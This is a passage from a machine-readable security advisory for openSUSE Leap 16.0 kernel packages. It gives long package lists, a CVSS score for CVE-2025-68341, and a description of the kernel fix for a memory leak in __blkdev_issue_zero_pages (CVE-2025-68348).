"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-68341"
},
{
"cve": "CVE-2025-68348",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68348"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nblock: fix memory leak in __blkdev_issue_zero_pages\n\nMove the fatal signal check before bio_alloc() to prevent a memory\nleak when BLKDEV_ZERO_KILLABLE is set and a fatal signal is pending.\n\nPreviously, the bio was allocated before checking for a fatal signal.\nIf a signal was pending, the code would break out of the loop without\nfreeing or chaining the just-allocated bio, causing a memory leak.\n\nThis matches the pattern already used in __blkdev_issue_write_zeroes()\nwhere the signal check precedes the allocation.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
